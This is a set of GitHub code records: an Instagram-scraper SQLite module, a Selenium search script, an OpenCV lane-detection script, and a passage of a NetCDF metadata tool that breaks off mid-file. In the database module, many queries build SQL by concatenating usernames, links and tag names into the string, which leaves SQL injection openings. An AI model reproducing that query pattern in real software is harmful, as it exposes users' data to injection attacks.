+{"seq_id": "30445027844", "text": "import sqlite3\nimport logging\nimport uuid\n\nfrom . import constants\n\nlogger = logging.getLogger('__name__')\n\n\nclass Database:\n\n def __init__(self):\n self.__connection = sqlite3.connect(constants.LOCAL_DB)\n self.__connection.execute(\"PRAGMA foreign_keys = 1\")\n\n def create_tables(self):\n cursor = self.__connection.cursor()\n\n try:\n cursor.execute(\"CREATE TABLE IF NOT EXISTS user (id INTEGER PRIMARY KEY UNIQUE, username TEXT);\")\n\n cursor.execute(\"CREATE TABLE IF NOT EXISTS tag \" +\n \"(id TEXT PRIMARY KEY UNIQUE, tagname TEXT UNIQUE);\")\n\n cursor.execute(\"CREATE TABLE IF NOT EXISTS post \" +\n \"(id TEXT PRIMARY KEY UNIQUE, link TEXT, has_multiple_content INTEGER, \" +\n \"user_id INTEGER, \" +\n \"FOREIGN KEY(user_id) REFERENCES user(id) ON DELETE SET NULL );\")\n\n cursor.execute(\"CREATE TABLE IF NOT EXISTS tag_post \" +\n \"(tag_id TEXT, post_id TEXT, in_top TEXT, in_recent INTEGER, \" +\n \"FOREIGN KEY(tag_id) REFERENCES tag(id) ON DELETE CASCADE, \" +\n \"FOREIGN KEY(post_id) REFERENCES post(id) ON DELETE CASCADE, \" +\n \"PRIMARY KEY(tag_id, post_id) );\")\n\n except sqlite3.Error as err:\n logger.error(err)\n print('SQL error at creating tables.')\n finally:\n cursor.close()\n\n def __execute_query_and_commit(self, query, dict_values=None):\n if dict_values is None:\n dict_values = {}\n\n cursor = self.__connection.cursor()\n try:\n cursor.execute(query, dict_values)\n except sqlite3.Error as err:\n logger.error('error at executing query: %s' % query)\n logger.error('error: %s' % err)\n finally:\n self.__connection.commit()\n cursor.close()\n\n def __execute_query_and_fetch(self, query):\n cursor = self.__connection.cursor()\n\n try:\n cursor.execute(query)\n except sqlite3.Error as err:\n logger.error('error at executing query: %s' % query)\n logger.error('error: %s' % err)\n finally:\n data = cursor.fetchall()\n cursor.close()\n return data\n\n def insert_tag(self, tag):\n query = \"INSERT OR IGNORE INTO tag VALUES (:id, :tagname);\"\n values = {'id': str(uuid.uuid4()), 'tagname': tag}\n self.__execute_query_and_commit(query, values)\n\n def insert_tag_post(self, link, tag, in_top=False, in_recent=False):\n query = \"INSERT OR IGNORE INTO tag_post VALUES (:tag_id, :post_id, :in_top, :in_recent);\"\n post_id = self.__get_post_id(link)\n tag_id = self.__get_tag_id(tag)\n values = {'tag_id': tag_id, 'post_id': post_id, 'in_top': in_top, 'in_recent': in_recent}\n self.__execute_query_and_commit(query, values)\n\n def insert_userid_and_username(self, userid, username):\n query = \"INSERT OR IGNORE INTO user(id, username) VALUES (:id, :username);\"\n values = {'id': userid, 'username': username}\n self.__execute_query_and_commit(query, values)\n\n def insert_post(self, link, has_multiple_content, userid=None):\n post_id = self.__get_post_id(link)\n\n if all(v is not None for v in [post_id, userid]):\n query = \"UPDATE post SET user_id =\" + userid + \" WHERE id ='\" + post_id + \"';\"\n self.__execute_query_and_commit(query)\n elif not post_id:\n query = \"INSERT INTO post VALUES (:id, :link, :has_multiple_content, :user_id);\"\n values = {'id': str(uuid.uuid4()), 'link': link, 'has_multiple_content': has_multiple_content,\n 'user_id': userid}\n self.__execute_query_and_commit(query, values)\n\n def retrieve_all_usernames(self):\n query = \"SELECT username FROM user ORDER BY username ASC;\"\n data = self.__execute_query_and_fetch(query)\n\n usernames = []\n for username in data:\n usernames.append(username[0])\n return sorted(usernames)\n\n def retrieve_all_tags(self):\n query = \"SELECT tagname FROM tag ORDER BY tagname ASC;\"\n data = self.__execute_query_and_fetch(query)\n\n tags = []\n for username in data:\n tags.append(username[0])\n return sorted(tags)\n\n def __get_post_id(self, link):\n query = \"SELECT id FROM post WHERE link ='\" + link + \"';\"\n data = self.__execute_query_and_fetch(query)\n\n if len(data) > 0:\n return data[0][0]\n return None\n\n def __get_tag_id(self, tagname):\n query = \"SELECT id FROM tag WHERE tagname ='\" + tagname + \"';\"\n data = self.__execute_query_and_fetch(query)\n\n if len(data) > 0:\n return data[0][0]\n return None\n\n def get_username_by_id(self, user_id):\n query = \"SELECT username FROM user WHERE id =\" + str(user_id) + \";\"\n data = self.__execute_query_and_fetch(query)\n\n if len(data) > 0:\n return data[0][0]\n return None\n\n def get_user_post_links(self, userid):\n query = \"SELECT link FROM post WHERE user_id='\" + userid + \"';\"\n data = self.__execute_query_and_fetch(query)\n\n post_links = []\n for row in data:\n post_links.append(row[0])\n return post_links\n\n def user_post_link_exists(self, username, link):\n query = \"SELECT EXISTS (SELECT 1 FROM post WHERE link ='\" + link + \"' AND user_id=(SELECT id FROM user WHERE\" \\\n + \" username='\" + username + \"') LIMIT 1);\"\n data = self.__execute_query_and_fetch(query)\n result = data[0][0]\n\n if result == 1:\n return True\n return False\n\n def user_exists(self, username):\n query = \"SELECT EXISTS( SELECT 1 FROM user WHERE username='\" + username + \"' LIMIT 1);\"\n data = self.__execute_query_and_fetch(query)\n result = data[0][0]\n\n if result == 1:\n return True\n return False\n\n def tag_exists(self, tagname):\n query = \"SELECT EXISTS( SELECT 1 FROM tag WHERE tagname='\" + tagname + \"' LIMIT 1);\"\n data = self.__execute_query_and_fetch(query)\n result = data[0][0]\n\n if result == 1:\n return True\n return False\n\n def get_id_by_username(self, username):\n query = \"SELECT id FROM user WHERE username ='\" + username + \"';\"\n data = self.__execute_query_and_fetch(query)\n\n if len(data) > 0:\n return data[0][0]\n return None\n\n def get_user_post_count(self, username):\n query = \"SELECT COUNT(*) FROM post WHERE user_id =(SELECT id FROM user WHERE username ='\" \\\n + username + \"');\"\n data = self.__execute_query_and_fetch(query)\n post_count = data[0][0]\n return post_count\n\n def get_top_tag_post_count(self, tag):\n tag_id = self.__get_tag_id(tag)\n query = \"SELECT COUNT(*) FROM tag_post WHERE tag_id ='\" + tag_id + \"' AND in_top=1;\"\n data = self.__execute_query_and_fetch(query)\n post_count = data[0][0]\n return post_count\n\n def get_recent_tag_post_count(self, tag):\n tag_id = self.__get_tag_id(tag)\n query = \"SELECT COUNT(*) FROM tag_post WHERE tag_id ='\" + tag_id + \"' AND in_recent=1;\"\n data = self.__execute_query_and_fetch(query)\n post_count = data[0][0]\n return post_count\n\n def rename_user(self, user_id, new_username):\n query = \"UPDATE user SET username ='\" + new_username + \"' WHERE id =\" + str(user_id) + \";\"\n self.__execute_query_and_commit(query)\n\n def remove_user(self, username):\n query = \"SELECT username FROM user WHERE username='\" + username + \"';\"\n data = self.__execute_query_and_fetch(query)\n\n if len(data) > 0:\n query = \"DELETE FROM user WHERE username = (:username);\"\n values = {'username': username}\n self.__execute_query_and_commit(query, values)\n self.remove_unused_posts()\n\n def remove_all_users(self):\n query = \"DELETE FROM user\"\n self.__execute_query_and_commit(query)\n self.remove_unused_posts()\n\n def remove_tag(self, tag):\n query = \"SELECT tagname FROM tag WHERE tagname='\" + tag + \"';\"\n data = self.__execute_query_and_fetch(query)\n\n if len(data) > 0:\n query = \"DELETE FROM tag WHERE tagname = (:tagname);\"\n values = {'tagname': tag}\n self.__execute_query_and_commit(query, values)\n self.remove_unused_posts()\n\n def remove_all_tags(self):\n query = \"DELETE FROM tag\"\n self.__execute_query_and_commit(query)\n\n query = \"DELETE FROM tag_post\"\n self.__execute_query_and_commit(query)\n\n self.remove_unused_posts()\n\n def remove_unused_posts(self):\n query = \"DELETE FROM post WHERE user_id is NULL and id NOT IN (SELECT post_id FROM tag_post)\"\n self.__execute_query_and_commit(query)\n\n def close_connection(self):\n self.__connection.close()\n", "repo_name": "zaironjacobs/instagram-scraper", "sub_path": "instagram_scraper/database.py", "file_name": "database.py", "file_ext": "py", "file_size_in_byte": 9123, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "31", "api": [{"api_name": "logging.getLogger", "line_number": 7, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 13, "usage_type": "call"}, {"api_name": "sqlite3.Error", "line_number": 36, "usage_type": "attribute"}, {"api_name": "sqlite3.Error", "line_number": 49, "usage_type": "attribute"}, {"api_name": "sqlite3.Error", "line_number": 61, "usage_type": "attribute"}, {"api_name": "uuid.uuid4", "line_number": 71, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 94, "usage_type": "call"}]}
+{"seq_id": "37097478636", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\ndriver = webdriver.Firefox()\ndriver.get(\"http://www.uol.com.br\")\n\ndriver.find_element_by_xpath(\"/html/body/header/div[2]/div/div[3]/div/div/input\").click()\n\nelement = WebDriverWait(driver, 10).until(\n EC.visibility_of_element_located((By.ID, \"searchForm\"))\n)\n\nform = driver.find_element_by_id(\"searchForm\")\nelem = form.find_element_by_name(\"q\")\nelem.clear()\nelem.send_keys(\"a vida\")\nelem.send_keys(Keys.RETURN)\n\nelement = WebDriverWait(driver, 15).until(\n EC.presence_of_element_located((By.CLASS_NAME, \"gs-webResult\"))\n)\n\nresultados = driver.find_elements_by_css_selector(\".gs-webResult\")\n\nfor item in resultados:\n titulo = item.find_element_by_css_selector(\".gs-title\").text\n print(titulo)", "repo_name": "LuisaBarbalho/pokeapi", "sub_path": "selenium_uol.py", "file_name": "selenium_uol.py", "file_ext": "py", "file_size_in_byte": 948, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "selenium.webdriver.Firefox", "line_number": 7, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 7, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 12, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.visibility_of_element_located", "line_number": 13, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 13, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.ID", "line_number": 13, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 13, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.keys.Keys.RETURN", "line_number": 20, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.keys.Keys", "line_number": 20, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 22, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 23, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 23, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CLASS_NAME", "line_number": 23, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 23, "usage_type": "name"}]}
+{"seq_id": "3888473773", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom audioop import reverse\nimport numpy as np\nimport cv2, random, math, copy\n\nimport pandas as pd\nline_temp = [[],[]]\n\nWidth = 640\nHeight = 480\n\ncap = cv2.VideoCapture(\"../subProject.avi\")\nwindow_title = 'camera'\n\nwarp_img_w = 320\nwarp_img_h = 240\n\nwarpx_margin = 45\nwarpy_margin = 3\n\nnwindows = 20\nmargin = 25\nminpix = 5\n\nlane_bin_th = 5\n\nwarp_src = np.array([\n [100,340], \n [0,413],\n [540,340],\n [640,413]\n], dtype=np.float32)\n\nwarp_dist = np.array([\n [0,0],\n [0,warp_img_h],\n [warp_img_w,0],\n [warp_img_w, warp_img_h]\n], dtype=np.float32)\n\ncalibrated = True\nif calibrated:\n mtx = np.array([\n [422.037858, 0.0, 245.895397], \n [0.0, 435.589734, 163.625535], \n [0.0, 0.0, 1.0]\n ])\n dist = np.array([-0.289296, 0.061035, 0.001786, 0.015238, 0.0])\n cal_mtx, cal_roi = cv2.getOptimalNewCameraMatrix(mtx, dist, (Width, Height), 1, (Width, Height))\n\ndef calibrate_image(frame):\n global Width, Height\n global mtx, dist\n global cal_mtx, cal_roi\n \n tf_image = cv2.undistort(frame, mtx, dist, None, cal_mtx)\n x, y, w, h = cal_roi\n tf_image = tf_image[y:y+h, x:x+w]\n\n return cv2.resize(tf_image, (Width, Height))\n\n\ndef warp_image(img, src, dst, size):\n M = cv2.getPerspectiveTransform(src, dst)\n Minv = cv2.getPerspectiveTransform(dst, src)\n warp_img = cv2.warpPerspective(img, M, size, flags=cv2.INTER_LINEAR)\n return warp_img, M, Minv\n\npre_rightx_current = 320\npre_leftx_current = 0\npre_rightx_current = 320\npre_leftx_current = 0\nmidpoint = 320\n\n\ndef warp_process_image(img):\n global nwindows\n global margin\n global minpix\n global lane_bin_th\n global line_temp\n global pre_rightx_current\n global pre_leftx_current\n global rightx_current\n global leftx_current\n global midpoint\n\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n\n m = cv2.mean(gray)[0]\n\n dst = cv2.add(gray ,(40 - m))\n\n blur_gray = cv2.GaussianBlur(dst,(5, 5), 3)\n\n\n cv2.circle(blur_gray, (158, 265),60, 255, -1) \n \n \n\n _, reverse = cv2.threshold(blur_gray, lane_bin_th, 255, cv2.THRESH_BINARY)\n lane = 255 - reverse\n\n\n histogram = np.sum(lane[195:205,:], axis=0) \n \n midpoint = int((pre_rightx_current+pre_leftx_current)/2)\n\n\n hist_threshold = 500\n\n if max(histogram[:midpoint]) < hist_threshold:\n leftx_current = 0 \n else:\n leftx_current = np.argmax(histogram[:midpoint])\n\n if max(histogram[midpoint:]) < hist_threshold:\n rightx_current = 320\n else:\n rightx_current = np.argmax(histogram[midpoint:]) + midpoint\n\n \n\n pre_rightx_current = rightx_current\n pre_leftx_current = leftx_current\n\n window_height = np.int(lane.shape[0]/nwindows)\n nz = lane.nonzero()\n\n left_lane_inds = []\n right_lane_inds = []\n \n lx, ly, rx, ry = [], [], [], []\n\n\n for window in range(nwindows):\n\n win_yl = lane.shape[0] - (window+1)*window_height\n win_yh = lane.shape[0] - window*window_height\n\n win_xll = leftx_current - margin\n win_xlh = leftx_current + margin\n win_xrl = rightx_current - margin\n win_xrh = rightx_current + margin\n\n cv2.rectangle(img,(win_xll,win_yl),(win_xlh,win_yh),(0,255,0), 2) \n cv2.rectangle(img,(win_xrl,win_yl),(win_xrh,win_yh),(0,255,0), 2) \n\n good_left_inds = ((nz[0] >= win_yl)&(nz[0] < win_yh)&(nz[1] >= win_xll)&(nz[1] < win_xlh)).nonzero()[0]\n good_right_inds = ((nz[0] >= win_yl)&(nz[0] < win_yh)&(nz[1] >= win_xrl)&(nz[1] < win_xrh)).nonzero()[0]\n\n left_lane_inds.append(good_left_inds)\n right_lane_inds.append(good_right_inds)\n\n if len(good_left_inds) > minpix:\n leftx_current = np.int(np.mean(nz[1][good_left_inds]))\n if len(good_right_inds) > minpix: \n rightx_current = np.int(np.mean(nz[1][good_right_inds]))\n\n lx.append(leftx_current)\n ly.append((win_yl + win_yh)/2)\n\n rx.append(rightx_current)\n ry.append((win_yl + win_yh)/2)\n\n left_lane_inds = np.concatenate(left_lane_inds)\n right_lane_inds = np.concatenate(right_lane_inds)\n\n\n \n lfit = np.polyfit(np.array(ly),np.array(lx),2)\n rfit = np.polyfit(np.array(ry),np.array(rx),2)\n\n img[nz[0][left_lane_inds], nz[1][left_lane_inds]] = [255, 0, 0]\n img[nz[0][right_lane_inds] , nz[1][right_lane_inds]] = [0, 0, 255]\n\n if count % 30 == 0:\n line_temp[0].append(leftx_current * 2) \n line_temp[1].append(rightx_current * 2) \n\n cv2.imshow(\"cam\", img)\n cv2.imshow(\"blur_gray\", blur_gray)\n cv2.imshow(\"reverse\", reverse)\n\n return lfit, rfit\n\ndef draw_lane(image, warp_img, Minv, left_fit, right_fit):\n global Width, Height\n yMax = warp_img.shape[0]\n ploty = np.linspace(0, yMax - 1, yMax)\n color_warp = np.zeros_like(warp_img).astype(np.uint8)\n \n left_fitx = left_fit[0]*ploty**2 + left_fit[1]*ploty + left_fit[2]\n right_fitx = right_fit[0]*ploty**2 + right_fit[1]*ploty + right_fit[2]\n \n pts_left = np.array([np.transpose(np.vstack([left_fitx, ploty]))])\n pts_right = np.array([np.flipud(np.transpose(np.vstack([right_fitx, ploty])))]) \n pts = np.hstack((pts_left, pts_right))\n \n color_warp = cv2.fillPoly(color_warp, np.int_([pts]), (0, 255, 0))\n newwarp = cv2.warpPerspective(color_warp, Minv, (Width, Height))\n\n return cv2.addWeighted(image, 1, newwarp, 0.3, 0)\n\ncount = 0\ndef start():\n global Width, Height, cap, count\n\n _, frame = cap.read()\n while not frame.size == (Width*Height*3):\n _, frame = cap.read()\n continue\n\n print(\"start\")\n\n while cap.isOpened():\n count += 1\n \n _, frame = cap.read()\n if frame is None:\n print('--(!) No captured frame -- Break!')\n # close the video file pointers\n line=pd.DataFrame(line_temp)\n line=line.transpose()\n line.to_csv('../line.csv',header=False, index=False)\n cap.release()\n break\n\n\n image = frame\n warp_img, M, Minv = warp_image(image, warp_src, warp_dist, (warp_img_w, warp_img_h))\n left_fit, right_fit = warp_process_image(warp_img)\n lane_img = draw_lane(image, warp_img, Minv, left_fit, right_fit)\n cv2.circle(lane_img, (100,340),5, (0,0,255), -1)\n cv2.circle(lane_img, (0,413),5, (0,255,0), -1)\n cv2.circle(lane_img, (540,340),5, (255,0,0), -1)\n cv2.circle(lane_img, (640,413),5, (0,255,255), -1)\n\n cv2.circle(lane_img, (pre_leftx_current*2, 400),5, (255,0,255), -1)\n cv2.circle(lane_img, (pre_rightx_current*2, 400),5, (255,0,255), -1)\n\n cv2.line(lane_img, (midpoint*2,0), (midpoint*2, 480), (255,255,255),2)\n \n cv2.imshow(window_title, lane_img)\n cv2.waitKey(1)\n\n\nif __name__ == '__main__':\n start()\n", "repo_name": "BreathIN423/lane_detection", "sub_path": "sliding_find_jh.py", "file_name": "sliding_find_jh.py", "file_ext": "py", "file_size_in_byte": 6832, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "cv2.VideoCapture", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 34, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 41, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 50, "usage_type": "call"}, {"api_name": "cv2.getOptimalNewCameraMatrix", "line_number": 51, "usage_type": "call"}, {"api_name": "cv2.undistort", "line_number": 58, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 62, "usage_type": "call"}, {"api_name": "cv2.getPerspectiveTransform", "line_number": 66, "usage_type": "call"}, {"api_name": "cv2.getPerspectiveTransform", "line_number": 67, "usage_type": "call"}, {"api_name": "cv2.warpPerspective", "line_number": 68, "usage_type": "call"}, {"api_name": "cv2.INTER_LINEAR", "line_number": 68, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 90, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 90, "usage_type": "attribute"}, {"api_name": "cv2.mean", "line_number": 92, "usage_type": "call"}, {"api_name": "cv2.add", "line_number": 94, "usage_type": "call"}, {"api_name": "cv2.GaussianBlur", "line_number": 96, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 99, "usage_type": "call"}, {"api_name": "audioop.reverse", "line_number": 103, "usage_type": "name"}, {"api_name": "cv2.threshold", "line_number": 103, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 103, "usage_type": "attribute"}, {"api_name": "audioop.reverse", "line_number": 104, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 129, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 148, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 158, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 158, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 160, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 160, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 173, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 173, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 174, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 174, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 183, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 184, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 185, "usage_type": "call"}, {"api_name": "audioop.reverse", "line_number": 185, "usage_type": "argument"}, {"api_name": "numpy.linspace", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 193, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 198, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 198, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 198, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 199, "usage_type": "call"}, {"api_name": "numpy.flipud", "line_number": 199, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 199, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 199, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 200, "usage_type": "call"}, {"api_name": "cv2.fillPoly", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.int_", "line_number": 202, "usage_type": "call"}, {"api_name": "cv2.warpPerspective", "line_number": 203, "usage_type": "call"}, {"api_name": "cv2.addWeighted", "line_number": 205, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 225, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 236, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 237, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 238, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 239, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 241, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 242, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 244, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 246, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 247, "usage_type": "call"}]}
+{"seq_id": "39173725539", "text": "from loguru import logger\nimport os\nfrom netCDF4 import Dataset\nimport pandas as pd\nimport numpy as np\nimport xarray as xr\nfrom typing import Annotated\nfrom typing import List\nfrom pathlib import Path\nfrom concurrent.futures import ProcessPoolExecutor\nfrom concurrent.futures import as_completed\nfrom rich import print\nimport typer\nfrom .typer_parameters import OrderCommands\nfrom .typer_parameters import typer_argument_source_directory\nfrom .typer_parameters import typer_option_filename_pattern\nfrom .typer_parameters import typer_argument_longitude_in_degrees\nfrom .typer_parameters import typer_argument_latitude_in_degrees\nfrom .typer_parameters import typer_option_csv\nfrom .typer_parameters import typer_option_verbose\nfrom .models import XarrayVariableSet\nfrom .models import select_xarray_variable_set_from_dataset\nfrom .models import select_netcdf_variable_set_from_dataset\nfrom .constants import VERBOSE_LEVEL_DEFAULT\nfrom .constants import NOT_AVAILABLE\nfrom .progress import DisplayMode\nfrom .progress import display_context\nfrom .print import print_chunk_shapes_table\nfrom .print import print_common_chunk_layouts\nfrom .select import select_fast\nfrom .csv import write_nested_dictionary_to_csv\n# from .rich_help_panel_names import rich_help_panel_diagnose\n\n\ndef format_compression(compression_dict):\n if isinstance(compression_dict, dict):\n # Keep only keys with True values\n return ', '.join([key for key, value in compression_dict.items() if value])\n return compression_dict\n\n\ndef get_netcdf_metadata(\n input_netcdf_path: Path,\n variable: str = None,\n variable_set: Annotated[XarrayVariableSet, typer.Option(help=\"Set of Xarray variables to diagnose\")] = XarrayVariableSet.all,\n longitude: Annotated[float, typer_argument_longitude_in_degrees] = 8,\n latitude: Annotated[float, typer_argument_latitude_in_degrees] = 45,\n csv: Annotated[Path, typer_option_csv] = None,\n verbose: Annotated[int, typer_option_verbose] = VERBOSE_LEVEL_DEFAULT,\n):\n \"\"\"\n \"\"\"\n if not os.path.exists(input_netcdf_path):\n return \"File not found: \" + input_netcdf_path\n\n with Dataset(input_netcdf_path, 'r') as dataset:\n metadata = {\n \"File name\": input_netcdf_path.name,\n \"File size\": os.path.getsize(input_netcdf_path), # in Bytes\n \"Dimensions\": {\n dim: len(dataset.dimensions[dim]) for dim in dataset.dimensions\n },\n }\n selected_variables = select_netcdf_variable_set_from_dataset(\n XarrayVariableSet, variable_set, dataset\n )\n data_variables = select_netcdf_variable_set_from_dataset(\n XarrayVariableSet, 'data', dataset\n )\n variables_metadata = {}\n for variable_name in selected_variables:\n variable = dataset[variable_name] # variable is not a simple string anymore!\n variable_metadata = {\n 'Shape': ' x '.join(map(str, variable.shape)),\n 'Chunks': ' x '.join(map(str, variable.chunking())),\n 'Cache*': ' x '.join(map(str, variable.get_var_chunk_cache())),\n 'Type': str(variable.dtype),\n 'Scale': getattr(variable, 'scale_factor', NOT_AVAILABLE),\n 'Offset': getattr(variable, 'add_offset', NOT_AVAILABLE),\n 'Compression': variable.filters() if 'filters' in dir(variable) else NOT_AVAILABLE,\n 'Shuffling': getattr(variable, 'shuffle', NOT_AVAILABLE),\n 'Read time': NOT_AVAILABLE,\n }\n variables_metadata[variable_name] = variable_metadata # Add info to variable_metadata\n if variable_name in data_variables:\n data_retrieval_time = select_fast(\n time_series=input_netcdf_path,\n variable=variable_name,\n longitude=longitude,\n latitude=latitude,\n )\n else:\n data_retrieval_time = NOT_AVAILABLE\n variables_metadata[variable_name]['Read time'] = data_retrieval_time\n\n metadata['Variables'] = variables_metadata\n\n if verbose:\n from .print import print_metadata_table\n print_metadata_table(metadata)\n\n return metadata, input_netcdf_path\n\n\ndef get_multiple_netcdf_metadata(\n file_paths: List[Path],\n variable: str = None,\n variable_set: XarrayVariableSet = XarrayVariableSet.all,\n csv: Path = None,\n verbose: int = VERBOSE_LEVEL_DEFAULT,\n):\n \"\"\"\n \"\"\"\n metadata_series = {}\n with ProcessPoolExecutor() as executor:\n futures = [\n executor.submit(\n get_netcdf_metadata,\n file_path,\n variable,\n variable_set.value,\n )\n for file_path in file_paths\n ]\n for future in as_completed(futures):\n try:\n metadata, input_netcdf_path = future.result()\n # logger.info(f'Metadata : {metadata}')\n metadata_series[input_netcdf_path.name] = metadata\n except Exception as e:\n logger.error(f\"Error processing file: {e}\")\n\n return metadata_series\n\n\nfrom typing import Optional\ndef collect_netcdf_metadata(\n source_directory: Annotated[Path, typer_argument_source_directory],\n pattern: Annotated[str, typer_option_filename_pattern] = \"*.nc\",\n variable_set: Annotated[XarrayVariableSet, typer.Option(help=\"Set of Xarray variables to diagnose\")] = XarrayVariableSet.all,\n long_table: Annotated[Optional[bool], 'Group rows of metadata per input NetCDF file and variable in a long table'] = False,\n group_metadata: Annotated[Optional[bool], 'Visually cluster rows of metadata per input NetCDF file and variable'] = False,\n csv: Annotated[Path, typer_option_csv] = None,\n verbose: Annotated[int, typer_option_verbose] = VERBOSE_LEVEL_DEFAULT,\n):\n \"\"\"Scan files in the source directory that match the pattern and diagnose the chunking shapes for each variable.\"\"\"\n source_directory = Path(source_directory)\n file_paths = list(source_directory.glob(pattern))\n mode = DisplayMode(verbose)\n with display_context[mode]:\n try:\n metadata_series = get_multiple_netcdf_metadata(\n file_paths=file_paths,\n variable_set=variable_set,\n )\n except TypeError as e:\n raise ValueError(\"Error occurred:\", e)\n\n if not long_table:\n from .print import print_metadata_series_table\n print_metadata_series_table(\n metadata_series=metadata_series,\n group_metadata=group_metadata,\n )\n else:\n from .print import print_metadata_series_long_table\n print_metadata_series_long_table(\n metadata_series=metadata_series,\n group_metadata=group_metadata,\n )\n\n if csv:\n write_nested_dictionary_to_csv(\n nested_dictionary=metadata_series,\n output_filename=csv,\n )\n\n\ndef detect_chunking_shapes(\n file_path: Path,\n variable_set: XarrayVariableSet = XarrayVariableSet.all,\n):\n \"\"\"Scan a single NetCDF file for chunking shapes per variable\"\"\"\n chunking_shapes = {}\n with xr.open_dataset(file_path, engine=\"netcdf4\") as dataset:\n selected_variables = select_xarray_variable_set_from_dataset(\n XarrayVariableSet, variable_set, dataset\n )\n for variable in selected_variables:\n chunking_shape = dataset[variable].encoding.get(\"chunksizes\")\n if chunking_shape and chunking_shape != \"contiguous\":\n chunking_shapes[variable] = chunking_shape\n\n return chunking_shapes, file_path.name\n\n\ndef detect_chunking_shapes_parallel(\n file_paths: List[Path],\n variable_set: XarrayVariableSet = XarrayVariableSet.all,\n):\n \"\"\"\n Detect and aggregate the chunking shapes of variables within a set of NetCDF files in parallel.\n\n Parameters\n ----------\n file_paths : list of Path\n A list of file paths pointing to the NetCDF files to be scanned.\n\n Returns\n -------\n dict\n A nested dictionary where the first level keys are variable names, and the\n second level keys are the chunking shapes encountered, with the associated\n values being sets of file names where those chunking shapes are found.\n \"\"\"\n aggregated_chunking_shapes = {}\n with ProcessPoolExecutor() as executor:\n futures = [\n executor.submit(detect_chunking_shapes, file_path, variable_set.value)\n for file_path in file_paths\n ]\n\n for future in as_completed(futures):\n try:\n chunking_shapes, file_name = future.result()\n # logger.info(f\"Scanned file: {file_name}\")\n\n for variable, chunking_shape in chunking_shapes.items():\n if variable not in 